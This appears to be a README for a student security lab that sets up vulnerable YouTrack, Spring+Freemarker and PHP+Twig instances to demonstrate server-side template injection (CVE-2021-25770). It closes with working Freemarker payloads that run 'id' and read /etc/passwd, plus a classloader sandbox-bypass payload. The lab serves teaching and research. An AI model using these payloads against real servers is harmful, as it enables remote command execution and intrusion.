This Docker project contains a case study POC for CVE 2021-25770 on Youtrack, a replica code on Spring+Freemarker as well as replica code on PHP+Twig to demonstrate the generalized concept of SSTI.
The project require Vagrant v2.3.4 and VirtualBox v7.x installed, and execute the following on an x86 environment:
$ git https://github.com/lamyongxian/cs5331-ssti.git
$ cd ./cs5331-ssti
$ vagrant up
- Youtrack Vulnerable*: http://192.168.56.10:8080/
- Youtrack Baseline*: http://192.168.56.10:8081/
- Spring + Freemarker: http://192.168.56.10:8082/
- PHP + Twig: http://192.168.56.10:8083/
*At this point, a Youtrack require a token to be entered during initial setup, which can be found in the follow directory within the Docker container:
/root/teamsysdata/conf/internal/services/configurationWizard/wizard_token.txt
(username: vagrant, password: vagrant)
To retrieve the Youtrack containers name:
$ sudo docker ps -a
Then use the docker exec to attach to respective Docker container
$ sudo docker exec -it <Container ID> bash
# cat /root/teamsysdata/conf/internal/services/configurationWizard/wizard_token.txt
<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("cat /etc/passwd")}
Using an underlying JDK-Spring vulnerability in class.protectionDomain.classLoader (Like Spring4Shell) to by-pass framework level sandbox protection:
<#assign classloader=article.class.protectionDomain.classLoader>
<#assign owc=classloader.loadClass("freemarker.template.ObjectWrapper")>
<#assign dwf=owc.getField("DEFAULT_WRAPPER").get(null)>
<#assign ec=classloader.loadClass("freemarker.template.utility.Execute")>
${dwf.newInstance(ec,null)("id")}